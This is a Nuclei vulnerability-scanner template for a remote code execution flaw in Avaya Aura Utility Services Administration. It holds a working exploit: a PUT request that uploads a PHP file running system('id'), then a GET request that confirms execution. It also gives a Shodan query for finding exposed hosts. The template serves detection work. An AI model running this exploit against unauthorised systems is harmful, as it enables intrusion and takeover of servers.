nuclei-templates/vulnerabilities/avaya/avaya-aura-rce.yaml

id: avaya-aura-rce

info:
  name: Avaya Aura Utility Services Administration - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  reference:
    - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
    - https://download.avaya.com/css/public/documents/101076366
  metadata:
    verified: "true"
    shodan-query: html:"Avaya Aura"
  tags: rce,avaya,aura,iot

requests:
  - raw:
      - |
        PUT /PhoneBackup/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA
        Connection: close

        <?php system('id');        

      - |
        GET /PhoneBackup/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA
        Connection: close        

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'

      - type: word
        part: header_2
        words:
          - "text/html"